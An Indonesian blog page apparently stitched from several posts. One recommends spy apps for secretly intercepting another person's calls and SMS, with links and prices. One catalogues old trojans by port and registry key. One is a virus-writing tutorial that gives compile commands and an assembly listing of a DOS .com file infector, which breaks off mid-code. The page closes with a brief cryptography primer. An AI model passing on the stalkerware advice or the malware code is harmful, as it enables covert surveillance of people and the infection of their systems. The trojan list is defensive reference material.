Trik sadap Telepon dan SMS Ponsel Java

 Trik sadap Telepon dan SMS Ponsel Java 



 Sadap-menyadap sudah bukan lagi hal yang asing di telinga kita, apalagi beberapa kali kita mendengar kasus penyadapan diperdengarkan di muka umum, baik di persidangan MK seperti yang terjadi beberapa hari lalu maupun sebelumnya di sidang pengadilan dengan terdakwa Urip Tri Gunawan dan Artalyta suryani. Mungkin masih banyak kasus-kasus penyadapan yang tidak di ungkap oleh pihak berwenang, demi melancarkan penyidikan atau mungkin juga untuk "menutupi" sesuatu.

Dengan cara dan proses penyadapan yang kian mudah di lakukan, maka sadap menyadap bukan lagi hanya monopoli pihak keamanan dan KPK saja, namun masyrakat awam pun bisa melakukannya, termasuk juga menangkisnya dengan kontra penyadapan. Tak perlu menggunakan perangkat khusus , ponsel yang jadi alat komunikasi sehari-hari pun bisa di jadikan senjata 'mata-mata' yang cukup ampuh.

Tentunya, harus menambahkan aplikasi pengintai khusus yang hasilnya masih kontroversi dari sisi hukum. Antara menggangu privacy dan ketertiban orang atau sebagai sarana mencari kebenaran.

Berikut ini adalah beberapa Aplikasi Sadap:

FlexiSpy
Aplikasi ini bisa memantau semua aktifitas yang di lakukan ponsel target. Mulai dari data SMS hingga percakapan telepon. Informasinya di kirim melalui kanal GPRS ke server FlexiSpy dan bisa di pantau tanpa si ketahui pemilik ponsel.

Yang terbaru, anda bisa secara otomatis merekam hasil intai FlexiSpy ke PC pribadi lewat aplikasi Flexi Record. Format ragamnya dalam bentuk file MP3 Harga aplikasi ini adalah 150 EUR dan bisa di dapatkan di http://www.flexispy.com.

VoxTrack Personal
Aplikasi garapan Psiloc ini merupakan upgrade terbaru dari Xelnex Lite. Fungsinya, untuk merekam percakapan telepon (masuk atau keluar) tanpa harus menekan tombol khusus. Proses pengaktifan modus rekamnya pun terbilang rahasia, karena tidak berbunyi 'beep'.jadi, cocok digunakan untuk memata-matai orang.

VoxTrack Personal bisa di dapatkan dari http://shop.psiloc.com. dengan harga Rp. 174.013


 Mobile-Spy
Layanan utama yang di tawarkan aplikasi ini adalah memonitor aktivitas penggunaan fitur ponsel, semisal SMS dan telepon secara diam-diam. Selain itu, ponsel ber-GPS pun bisa di data lokasi mana saja yang pernah di singgahi. Bahkan histori browsing internetpun bisa direkam lengkap dengan Mobile Spy.

Anda bisa berlangganan apliksai berbasis layanan ini dengan mendaftar di http://www.mobile-spy.com




SMS Anywhere
SMS Anywhwre bekerja dengan meneruskan (forwad) semua SMS yang di kirim dam di terima ponsel target dan bekerja tanpa sepengetahuan pemilik ponsel. Karena aplikasi ini tidak menggunakan user interface sehingga tidak akan terlihat di layar ponsel target.

Aplikasi SMS Anywhere sebenarnya diperuntukan bagi orang yang memiliki beberapa ponsel dan menginginkan semua pesannya bisa dibaca di ponsel lainnya. Jalan yang paling mudah dengan melakukan forwading ke nomer yang diinginkan. Nah, SMS Anywhere ini bisa melekukannya secara otomatis. Nah, karena aplikasinya tersembunyi maka layanan ini bisa di menfaatkan untuk melirik sms orang lain.

Penasaran? silakan akses situs http://www.wireless-labs.com/smsanywhere/

Bagaimana dengan kontra penyadapan?

Anda tidak perlu terlalu takut alias phobia dengan ponsel. Seperti penyakit dengan obat, juga virus dengan anti virusnya, teknologi penyadapan pun punya penawarnya. Berikut beberapa tips ringan untuk menangkalnya.

1. Menangkal Penyadapan Komunikasi Suara

Meng-enskripsi data suara adalah salah satu cara. Cara kerja enkripsi dilakukan sengan menambahkan kode atau kunci. Percakapan yang anda lakukan d ponsel itu nantinya akan di kemas dengan kode-kode.
Sehingga hanya bisa dibaca (dengar) dengan ponsel yang memiliki pemecah kode yang sesuai.

Ada beberapa aplikasi yang bisa digunakan untuk keperluan ini, mereka adalah;

Cellcrypt
Aplikasi ini di buat untuk ponsel Symbian 2nd edition. Anda bisa memdownloadnya di www.voylent.com atauwww.cellcrypt.com/vx22rc1.sis.







SecureGSM
khusus pengguna smartphone dan PDA-phone berbasis Windows Mobile, tersedia aplikasi SecureGSM. Cara kerjanya hampir sama dengan cellcrypt, hanya saja dengan cara penggunaanyang sedikit berbeda.

2. Menangkal Penyadapan SMS

Ada dua aplikasi yang bisa di gunakan, yakni Fortress SMS(http://www.fortressmail.net/fortress_sms.htm) dan SMS007. dimana keduanya diperuntukkan bagi HP java.


Cara Alternatif

Belakangan ini sejumlah ponsel bermerek lokal memilik program unik yang berbasis voice changer. Salah satunya adalah ponsel bermerek IMO G531 dengan fitur MAGIC SOUND-nya, meski di buat untuk keperluan iseng dan FUN, fitur voice changer ini dapat dapat digunakan untuk menghindari kita dari penyadapan.

Voice changer akan merubah frekuensi suara anda sehingga dapat berubah menjadi lebih besar atau lebih kecil, menyerupai suara orang lain sehingga suara asli anda tidak dapat di kenali lawan bicara.

Aktivasi MagicSound di IMO G531 ini bisa di lakukan sesaat setelah kita menghubungi nomer tujuan. Setelah aktif maka bisa di pastikan sipenerima telepon sulit untuk mengenali si empunya suara.

Sampai sat ini belum di ketahui apakah ada alat yang bisa mengembalikan suara yang mengalami perubahan frekuensi ini ke frekuensi awal. 
 




Read More..

Port Berbahaya (Port Danger)

Port Berbahaya
Perbincangan mengenai port masih sering menghiasi milis-milis komputer, banyak pertanyaan yang membutuhkan jawaban. saya berharap penjelasan berikut dapat menambah wawasan kita terhadap port dan bahaya yang memanfaatkan port sebagai jalan masuk ke dalam sebuah otoritas sistem.

SUDAH BUKAN RAHASIA LAGI BILA BANYAK PROGRAM
di internet saat ini yang sangat merugikan pengguna komputer awam, banyak penyerang dengan sengaja memasukan program yang apabila kita lengah maka program tersebut bekerja melalui port tertentu.
Komputer yang sering kita pakai ternyata memiliki banyak port, yang sebagian besar bahkan kita semua tidak tahu kegunaan dari port tersebut. Disini saya akan mencoba memberi beberapa contoh port mana saja yang sering dipakai untuk menyusup bersama dengan contoh program yang memakai port tersebut.
Program hacking biasanya dibuat untuk memasukan backdoor, atau lubang secara sengaja dengan melewati sistem keamanan dari target, agar program tersebut tidak terlihat sebagai sebuah ancaman oleh target, dan penyerang bisa melakukan manipulasi program tersebut untuk tujuan tertentu. Software yang menjadi contoh dibawah ini bisa dibagi menjadi 3 bagian yaitu virus, worms, dan Trojan.
Virus: suatu program komputer yang bisa menggandakan dirinya dengan menggunakan atau membutuhkan host program.
Worm: Worm tidak seperti virus, dia bisa menggandakan dirinya tanpa bantuan dari host program. Sekali tereksekusi maka worm akan meng-compile dan menyebarkan
dirinya sendiri secara masal.
Trojan: suatu program yang berisi kode yang merusak dibalik tampilan maupun kegunaan yang terlihat normal.
Program dan port yang dilewati dibawah ini biasanya tidak diberitahu kepada korban, setelah mengirimkan beberapa file kepada beberapa korban maka si penyerang tinggal menggunakan scan dan mencari korban yang aktif, bila penyerang menemukan korban yang aktif maka kendali sudah di tangan dia. Tanpa tunggu lebih lama, mari kita lihat beberapa program jahat beserta port yang dilewatinya

1. Port 21, 5400 - 5402
banyak program yang memakai port ini sebagai sarana untuk merusak, contohnya program back construction
yang bekerja dengan cara menshare port 21 dan membuat file yang di upload maupun di download tidak terlihat.
Beberapa program sejenis biasanya menuliskan dirinya ke registry seperti program back construction ini
yang menuliskan dirinya ke HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\ (Key: Shell). Contoh program lain yang memakai port 21 ini sebagai sarananya adalah Blade Runner, Fore, Invisible Ftp, Larva, WebEx, WinCrash dll.

2. Port 23
Port ini biasanya digunakan untuk login jarak jauh ke komputer lain dengan menggunakan telnet. Ada beberapa program yang menggunakan port ini sebagai jalan untuk masuk seperti Tiny Telnet Server yang berjalan pada system yang sudah terinfeksi secara diam-diam. Program ini juga menuliskan dirinya ke dalam registry, yang dapat
ditemukan di HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio  n\Run Windll.exe = "C:\\WINDOWS\\Windll.exe".

3. Port 25, 110
Port ini digunakan untuk pentransferan pesan sederhana, banyak program - program yang sering beraksi melalui port ini seperti Antigen yang berusaha menipu korbannya dengan mengirim pesan berupa joke, yang ketika dibuka oleh korban maka program ini akan memasukan keylogging, Dos control, atau remote backdoor. Program ini biasanya sering mengubah nama filenya menjadi beberapa nama dan sering menyamarkan ikon. Contoh lain program yang menyerang melalui mail antara lain yaitu tapiras, WinPC, Shtrilitz, Ajan, Haebu Coceda, Happy99, Kuang2, Terminator, ProMail Trojan dll.


Contoh program yang memakai port ini adalah Deep Throat dan pernah di bahas pada Neotek edisi beberapa waktu lalu. Program ini memiliki banyak feature termasuk mode "siluman" untuk server FTP agar bisa mengupload, dowload dan menghapus file, pilihan lainnya adalah mengijinkan penyerang untuk melihat layar, mengambil password, membuka web browser, restart sistem, bahkan mengontrol program yang sedang berjalan. Program ini menuliskan dirinya pada registry
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ (Key: SystemTray)

5.Port 80
Program Executor menggunakan port 80 sebagai jalan untuk masuk ke dalam komputer. Program ini adalah salah satu program remote yang berbahaya, bisa menghapus file system atau setting suatu komputer, biasanya terinstal dengan nama sexec.exe dan menuliskan dirinya di
registry pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\ <>Executer1="C:\windows\sexec.exe"
6. Port 113
Kazimas yang merupakan IRC worm menggunakan port ini, bekerja agar apabila mIRC sudah terkoneksi dengan server segera masuk ke channel tertentu, filenya bernama
milbug_a.exe dan besarnya 10 kb. Kazimas meng-copy
dirinya ke beberapa direktori seperti
C:\WINDOWS\KAZIMAS.EXE
C:\WINDOWS\SYSTEM\PSYS.EXE
C:\MIRC\DOWNLOAD\MIRC60.EXE
C:\MIRC\LOGS\LOGGING.EXE

7. Port 531, 1045
Virus Rasmin, yang dibuat dengan Visual C++ menggunakan port 531, banyak yang bilang virus ini dibuat untuk menjalankan perintah yang spesifik dari pembuatnya. Program ini bersembunyi dengan beberapa nama antara lain RASMIN.EXE, WSPOOL.EXE, INIPX.EXE,
UPGRADE.EXE, WINSRVC.EXE.

8. Port 555, 9989
Phase Zero menggunakan port ini untuk melakukan aksinya, tujuan utama dari Trojan ini adalah untuk merusak system dari target. Program ini baru bisa merusak bila setup program dieksekusi dari komputer host bersangkutan. Dalam registry program ini tertulis pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
(Key: MsgServ)

9.Port 666
Beberapa program yang melewati port ini antara lain
Attack FTP, Cain and Abel, Satanz Backdoor, dan ServeU.
Attack FTP membuat sebuah server ftp yang full permission untuk upload maupun download secara tersembunyi melalui port 666, program ini dalam registry tertulis pada HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ (Key: Reminder). Program Cain dibuat untuk mencuri password, sementara Abel adalah sebuah remote server yang digunakan untuk melakukan transfer file secara tersembunyi, file yang perlu diwaspadai adalah abel.exe. 
Program seperti Satanz Backdoor, dan ServeU dikenal sebagai remote akses tersembunyi cukup berbahaya yang memerlukan resource system yang cukup kecil.
10. Port 1010 - 1015
Doly Trojan digunakan untuk mendapatkan remote terhadap target secara komplit, program ini berbahaya dan sering menggunakan port yang berbeda untuk menyerang, beberapa berita meyatakan bahwa filenamenya bisa di modifikasi. Registry key program ini mungkin berada di HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run untuk file tesk.exe.


11. Port 1042
BLA yang merupakan program remote control memakai port ini, BLA memiliki fasilitas antara lain untuk mengirim ICMP echo dan me-restart target. Program ini menuliskan dirinya pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\ System = "C:\WINDOWS\System\mprdll.exe" dan
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\ SystemDoor = "C:\WINDOWS\System\rundll argp1". File
yang perlu diwaspadai adalah mprdll.exe.
12. Port 1234
Contoh program yang menggunakan port ini adalah Ultors Trojan, merupakan program telnet lain yang di desain agar kita bisa melakukan execute command atau shell command secara remote, untuk melihat proses yang sedang berjalan atau mematikan/restart system target. Saat ini beberapa feature telah ditambahkan seperti fasilitas untuk mengirim pesan dan menampilkan pesan error.
13. Port 1243, 6776
BackDoor-G yang merupakan variasi dari program subseven menggunakan port ini. Setelah terinfeksi, program ini akan memberikan akses tak terbatas dari sistem target kepada penyerang melalui internet. Program ini memiliki banyak feature, dan biasanya disusupkan melalui attachment email. Software ini biasanya berada pada beberapa tempat seperti \WINDOWS\NODLL.EXE

\WINDOWS\SERVER.EXE atau KERNEL16.DLL atau WINDOW.EXE
WINDOWS\SYSTEM\WATCHING.DLL atau LMDRK_33.DLL
Contoh lain yang menggunakan port ini adalah
SubSevenApocalypse.

14. Port 1245
program yang menggunakan port ini salah satunya adalah
VooDoo Doll. Program ini pada awalnya memiliki
feature remote control yang terbatas, nama program ini
diambil dari komunitas underground yang menyebarkan
software tersebut. VooDoo Doll bisa menimbulkan kerusakan
seperti mengcopy file target berkali-kali, pada beberapa
kasus bisa membuat file sistem menjadi rusak.
15. Port 1492
FTP99CMP adalah contoh lain dari program ftp server
yang menggunakan port ini. Program ini menuliskan
dirinya pada Registry Key seperti
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Key: WinDLL_16)
16. Port 1981
Shockrave yang merupakan program remote control menggunakan
port ini. Dalam Registry dapat ditemukan pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\ (Key: NetworkPopup). Program yang perlu
diwaspadai adalah netpopup.exe.
17. Port 1999
Sebagai remote backdoor Trojan yang pertama BackDoor
sudah tersebar ke segala penjuru dunia. Dibuat menggunakan
Visual Basic, program ini cukup banyak featurenya
seperti:
- kontrol cd-rom
- kontrol Ctrl-Alt-Del
- pesan
- chat
- manajemen file
- control mouse
Selama configurasi, Registry Keynya terdapat pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
(Key: notpa) program yang perlu diwaspadai adalah notpa.exe.
18. Port 1999-2005, 9878
Remote control Trojan yang berasal dari Jerman dan bernama
Transmission Scout memiliki banyak featurefeature
yang cukup berbahaya. Program ini dalam registry
dapat ditemukan pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
(Key: kernel16).
19. Port 2001
Trojan Cow yang merupakan contoh lain remote backdoor
Trojan memakai port ini. TrojanCow memiliki banyak
feature seperti:
- membuka/menutup CD-ROM
- menghilangkan desktop icon
- menghilangkan tombol start
- menghilangkan system tray
- menghilangkan penunjuk waktu
- merubah background
- menghapus file
- mematikan/restart PC target
- log off windows
selama configurasi, Registry Keynya bisa ditemukan pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Key: SysWindow )
20. Port 2115
Bugs yang merupakan program remote akses sederhana
menggunakan port ini, memiliki feature seperti manajemen
file, serta mengontrol window melalui GUI yang terbatas.
Pada registry berada di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
(Key: SysTray )
21. port 2140, 3150
The Invasor yaitu program remote akses dengan feature
seperti pesan, kontrol suara, format, dan screen capture
merupakan contoh program yang menggunakan port ini.
Dalam registry bisa ditemukan
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
(Key: SystemDLL32)
22. Port 2155, 5512
Illusion Mailer yang merupakan email spammmer yang
membuat si penyerang seakan-akan korban dan mengirim
email dari komputer target, yang muncul pada e-mail
header adalah IP Address target dimana sebenarnya yang
mengirim pesan adalah si penyerang. Dalam registry
program ini mencatat dirinya pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Key: Sysmem)
23. Port 2565
Striker yang apabila di eksekusi, tujuan utamanya adalah
menghancurkan windows, program ini akan menghilang
setelah sistem di restart. File yang perlu diwaspadai
adalah servers.exe
24. Port 2600
Backdoor remote akses Trojan yang bernama Digital
RootBeer menggunakan port ini. Beberapa feature yang
dimilikinya adalah:
- pesan
- kontrol monitor
- chat
- kontrol audio
dalam registry bisa ditemukan pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
(Key:ActiveXConsole)
25. Port 2989
RAT merupakan salah satu dari remote akses backdoor
trojan yang berbahaya. RAT di buat untu merusak hard
disk. Program ini dalam registry bisa dilihat pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\ Explorer = "C:\WINDOW\system\MSGSRV16.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\Default=" "
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\ Explorer=" "
26. Port 3459-3801
Trojan Eclipse pada dasarnya adalah salah satu program
FTP yang berjalan secara tersembunyi. Apabila program
ini tereksekusi, maka penyerang memiliki hak penuh atas
akses FTP ke seluruh file termasuk file exe, menghapus,
membaca, dan merubahnya. Eclipse menuliskan dirinya
pada registry, yang terdapat di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\ Rnaapp="C:\WINDOWS\SYSTEM (Key: rmaapp)". File
yang perlu diwaspadai adalah rmaapp.exe
27. Port 3700, 9872-9875, 10067, 10167
Portal of Doom yang merupakan salah satu Trojan remote
control yang popular menggunakan salah satu port ini.
Program ini memiliki feature seperti kontrol CDROM,
kontrol audio, file explorer, kontrol taskbar, keylogger, dll.
Untuk melihat registry keynya, bisa di temukan pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\ (Key: String).
28. Port 4567
File Nail adalah salah satu ICQ backdoor, yang menimbulkan
keresahan pada komunitas ICQ.
29. Port 5000
Bubbel adalah remote backdoor Trojan yang menggunakan
port ini, dengan feature yang hampir sama dengan
Trojan Cow terbaru termasuk mengirim pesan, kontrol
monitor, kontrol modem, kontrol audio, dll.
30. Port 5001, 30303, 50505
Sockets de Troie adalah virus yang penyebarannya dibantu
oleh backdoor remote administration. Apabila sudah
tereksekusi, virus ini menampilkan DLL error yang sederhana
lalu mengcopy dirinya pada directory Windows\System
dengan nama MSCHV32.EXE dan memodifikasi windows
registry. Biasanya virus ini bisa dilihat pada registry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrenVersion\
RunLoadMSchv32Drv =C:\WINDOWS\SYSTEM\MSchv32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrenVersion\
RunLoadMgadeskdll = C:\WINDOWS\SYSTEM\Mgadeskdll.exe
31. Port 5151
Contoh program yang memakai port ini adalah Optix yang
merupakan remote akses trojan dan di-compile dengan
Borland Delphi 5. feature yang terdapat di program ini
antara lain merestart sistem, upload file, melihat proses
yang sedang berjalan, mematikan proses dll. File yang
harus diwaspadai adalah semua file Backdoor.optix
termasuk Winstart.bat
32. Port 5569
Robo-Hack yang merupakan remote akses backdoor lama
dan ditulis menggunakan Visual Basic menggunakan port
ini. Program ini tidak menyebarkan dirinya, dan memiliki
beberapa feature dasar seperti sistem monitoring, edit
file, restart/matikan sistem, kontrol CDROM. File yang
perlu diwaspadai adalah robo-serv.exe
33. Port 6969, 16969
Priority adalah program remote kontrol yang dibuat oleh
Visul Basic dan memiliki banyak feature seperti kontrol
CDROM, kontrol audio, file explorer, kontrol taskbar,
kontrol desktop, shutdown/restart sistem, port scanning
dll. Pada registry bisa kita lihat di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\ (Key : Pserver).
34. Port 7000
Remote Grab menggunakan port ini. Program yang berlaku
seperti penangkap layar ini dibuat untuk remote
spying, dalam konfigurasi, file ini mengcopy dirinya ke
C:\WINDOWS\System\mprexe.exe
35. Port 7597
RAT.QAZ, W32.QAZ.Worm, HLLW.QAZ, QAZ Trojan
menggunakan port ini. Merupakan remote akses yang dicompile oleh MS Visual C++. File yang dieksekusi
adalah qazwsx.hsq. Dalam registry, bisa kita lihat pada
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"StartIE"="C:\WINDOWS\NOTEPAD.EXE qazwsx.hsq".
File yang perlu diwaspadai adalah notepad.exe (setelah
mengapus file ini, kemudian rename note.exe menjadi
notepad.exe).
36. Port 10101
BrainSpy adalah Trojan remote kontrol yang memiliki
feature seperti Trojan sejenisnya. Trojan ini memiliki
kemampuan untuk menghapus daftar virus yang telah di
scan. Pada registry bisa dilihat di beberapa tempat seperti:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Dualji
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Gbubuzhnw
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Fexhqcux
37. Port 10520
Acid Shivers, merupakan Trojan remote kontrol yang melalui
service telnet untuk mengeksekusi command dan
memiliki kemampuan untuk mengirim pesan pada penyerang
bila sistem target telah aktif. File yang perlu
diwaspadai adalah en-cid12.exe, en-cid12.dat

38. Port 12223
keylogger seperti Hack'99 meggunakan port ini, seperti
keylogger lainnya, program ini bisa mengirimkan hasil
ketikan korban secara real-time (apabila tersambung
dengan internet tentunya).
39. Port 18000
Service Pro adalah salah satu remote backdoor Trojan
dengan kemampuan seperti menghapus file, menjalankan
program, shutdown dan restart PC korban, log off
windows dll. Pada registry bisa dilihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\Run - Srvcpro
40. Port 20000 - 20001
Program remoe kontrol yang bernama Millenium
menggunakan port ini, dibuat dengan Visual Basic,
program ini memiliki kemampuan seperti kontrol cdrom,
kontrol audio, keylogger, kontrol taskbar dan desktop,
port scanning dll. Pada registri bisa kita lihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
(Key: Millenium). File yang perlu diwaspadai adalah hool.exe
41. Port 22222, 33333
Prosiak merupakan program remote kontrol dengan kemampuan
seperti kontrol cdrom, kontrol audio, kontrol
desktop dll. Kita bisa lihat registry keynya di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
(Key: Microsoft DLL Loader). File yangperlu diwaspadai
adalah prosiak.exe.
42. Port 30029

salah satu program yang memakai port ini adalah AOL
Trojan. Trojan ini menginfeksi DOS.EXE, dan bisa menyebarkan
dirinya melali LAN, WAN, INTERNET, atau
melalui email. Pada registry bisa dilihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
(Key: dat92003).


43. Port 30100 - 30102
NetSphere yang merupakan program remote yang
powerfull dan berbahaya menggunakan port ini. Feature
yang ada pada Trojan ini antara lain shutdown/restart
sistem, kontrol audio, melihat informasi sistem target
secara komplit, kontrol mouse, chat dll. Dalam registry
bisa kita lihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - nssx
44. Port 1349, 31337 - 31338, 54320 - 54321
Back Orifice program remote yang terkenal dan sudah
menyebar luas menggunakan port ini. BO mengendalikan
nyaris sepenuhnya terhadap sistem, termasuk restart
sistem serta mengirim dan menerima file.

45. Port 33911
Spirit, yang kita kenal sebagai remote backdoor dengan
kemampuan unik yaitu merusak monitor. Kabarnya
program ini mereset resolusi layar dan merubah refresh
rate dari layar juga. File yang perlu diwaspadai adalah
windown.exe dan pada registry bisa kita lihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunService
(Key: SystemTray).

46. Port 35000
Infector adalah remote akses Trojan yang di compile
menggunakan Borland Delphi 5 dan memiliki kemampuan
seperti menutup server, merubah port, mengganti
password, restart/shutdown sistem, log off user dll. File
yang perlu diwaspadai adalah d3x.drv, FC32.exe,
apxil32.exe, dan setup.int pada direktori windows.

47. Port 40412
Keylogger The Spy menggunakan port ini. Program ini
hanya bisa mengirimkan hasilnya secara langsung, tidak
bisa menyimpannya dulu bila target sedang dalam keadaan
off line. Pada registry bisa kita lihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
(Key : systray)

48. Port 47262
Program Delta Source terinspirasi dari Back Orifice, dibuat
menggunakan Visual Basic. Sebagai hasilnya semua
feature dari program ini sama seperti feature yang ada
pada BO. Dalam registry bisa kita lihat pada
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
(Key: Ds admin tool)
 49. Port 65000
Devil merupakan program remote kontrol yang dibuat
dengan Visual Basic. Software ini tidak akan aktif kembai
bila sistem target telah di restart. Beberapa feature yang
ada antara lain kontrol sdrom, dan mematikan aplikasi.
File yang perlu diwaspadai adalah opscript.exe,
winamp34.exe, wingenocid.exe.
50. Port 6400
The thing adalah program yang dibuat untuk meng-upload
dan engeksekusi suatu program secara remote. Dalam
registry bisa kita lihat pada
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
(Key: Default)
51. Port 119
Happy 99 sebenarnya sebuah program yang menampilkan
gambar kembang api yang indah, tetapi di belakang
layar, dia mengirimkan keylogger, DoS control dll.
52. Port 27374
SubSeven Apocalypse menggunakan port ini, merupakan
program Trojan yang tidak kalah terkenalnya dengan
Back Orifice. Feature yang terdapat di program ini antara
lain bisa mengendalikan mouse, spy ICQ, membuka web
browser untuk masuk ke site yg telah ditentukan dll.


Gambar 9. Sub Seven Apocalypse

.: TIADA HARI TANPA BELAJAR :.

Read More..

Membuat Viruss 486

Membuat Viruss 486

Menjadi korban virus mungkin adalah hal yang menyedihkan. Bahasan seputar virus adalah bahasan yang asyik untuk disimak, telah beberapa kali bahasan virus diangkat di artikel ini. ’Ade The Teroris’ memberikan cara membuat virus dengan menggunakan Assembly Language, yaitu bahasa pemrograman yang populer.



KITA PARA PENGGUNA KOMPUTER YANG SUDAH AHLI
atau professional maupun para pemula dan semua penguna komputer tentu sudah tidak asing lagi
dengan istilah virus komputer, atau anda telah menjadi korbannya.
Bagaimana perasaan anda pada waktu anda menjadi korban keganasan virus komputer? Yang saya tahu pasti anda kesal, marah, frustasi dan mengutuk para pembuat virus
Tapi tidak semuanya begitu, ada sekelompok orang yang senang bila komputernya terkena virus atau mereka sengaja memasukkan virus kekomputer mereka, apalagi virus itu jenis baru dan yang pasti lebih berbahaya. Dan mereka nantinya akan meneliti virus tersebut lalu dikembangkan untuk dijadikan virus yang lebih berbahaya.
Tapi bagaimana dengan perasaan pembuat virus itu?
Apakah senang, bangga atau biasa saja?
Di dalam artikel ini anda akan saya ajak untuk ikut merasakan dalam membuat virus komputer, buku ini ditulis
hanya untuk pembelajaran atau hanya untuk pendidikan semata, dan semuanya saya kembalikan kepada sikap kedewasaan anda.

Di artikel ini anda akan diajari cara-cara membuat virus komputer dengan bahasa pemrograman tingkat dasar atau bahasa mesin yaitu bahasa pemrograman assembler atau assembling, yang banyak digunakan oleh para pembuat virus, dikarena ukuran file yang dihasilkan (dibuku ini adalah virus) lebih kecil dibanding dengan bahasa pemrograman lainnya tanpa mengurangi kemampuannya
yang dashyat.
Dan listing virus yang akan saya berikan pada pertemuan ini adalah listing virus _468.
Listing virus ini di kembangkan dari virus ALT-11 Mag dan diberi nama _468, apa artinya nama itu, yang pasti lebih ganas dan bagus, maunya sih.

Keterangan Virus _468
  • ? Tidak menginfeksi command.com
  • ? Pertambahan file .com: xxx byte
  • ? Dapat mencari direktori untuk file yang belum pernah terinfeksi, bila tidak ada akan mencari direktori sebelumnya, sampai file terinfeksi
  • ? Tidak akan melakukan lagi bila (melakukan penginfeksian) file yang sudah terinfeksi (setiap berjalan menginfeksi satu)
  • ? Akan mengembalikan atribut asli dari file yang diinfeksinya dan mengembalikan alur aslinya (original path)
  • ? File yang memiliki atribut atau bendera read only (hanya membaca) tetap dapat diinfeksi
Cara mengkompile

tasm /m2 .asm
tlink /t .obj
Listing virus _468
Ketikan listing virus ini dengan pelan-pelan dan teliti lalu
simpan dengan nama _486.Asm atau nama yang lain
yang penting harus berekstensi Asm (*.Asm), dan
compile-lah sesuai cara diatas sehingga dapat membentuk
suatu program (virus).

.model tiny
.code
org 100h ; melakukan penyesuaian untuk psp
start:
call get_disp ; masukkan ip
get_disp:
pop bp
sub bp, offset get_disp ; bp = penggantian ; kode
; label offset asli disimpan
;di dalam kode mesin
save_path:
mov ah, 47h ; simpan cwd
xor dl, dl ; 0 = default drive
lea si, [bp + org_path]
int 21h
get_dta:
mov ah, 2fh
int 21h
mov [bp + old_dta_off], bx ; simpan dta offset tua
set_dta: ; merekam dta
mov ah, 1ah
lea dx, [bp + dta_filler]
int 21h
search:
mov ah, 4eh ; temukan file pertama
mov cx, [bp + search_attrib] ; jika dta sukses
diciptakan
lea dx, [bp + search_mask]
int 21h
jnc clear_attrib ;jika ditemukan, melanjutkan
find_next:
mov ah, 4fh ; ke file berikutnya
int 21h
jnc clear_attrib
still_searching:
mov ah, 3bh
lea dx, [bp + previous_dir] ; cd ..
int 21h




-- RED EYES --

Read More..

Kriptografi

Kriptografi (cryptography) merupakan ilmu dan seni penyimpanan pesan, data, atau informasi secara aman. Kriptografi (Cryptography) berasal dari bahasa Yunani yaitu dari kata Crypto dan Graphiayang berarti penulisan rahasia. Kriptografi adalah suatu ilmu yang mempelajari penulisan secara rahasia. Kriptografi merupakan bagian dari suatu cabang ilmu matematika yang disebut Cryptology. Kriptografi bertujuan menjaga kerahasiaan informasi yang terkandung dalam data sehingga informasi tersebut tidak dapat diketahui oleh pihak yang tidak sah.


Dalam menjaga kerahasiaan data, kriptografi mentransformasikan data jelas (plaintext) ke dalam bentuk data sandi (ciphertext) yang tidak dapat dikenali. Ciphertext inilah yang kemudian dikirimkan oleh pengirim (sender) kepada penerima (receiver). Setelah sampai di penerima, ciphertext tersebut ditranformasikan kembali ke dalam bentuk plaintext agar dapat dikenali.
Berikut ini beberapa terminologi dasar dari kriptografi serta hal-hal yang berkaitan dengan terminologi tersebut,
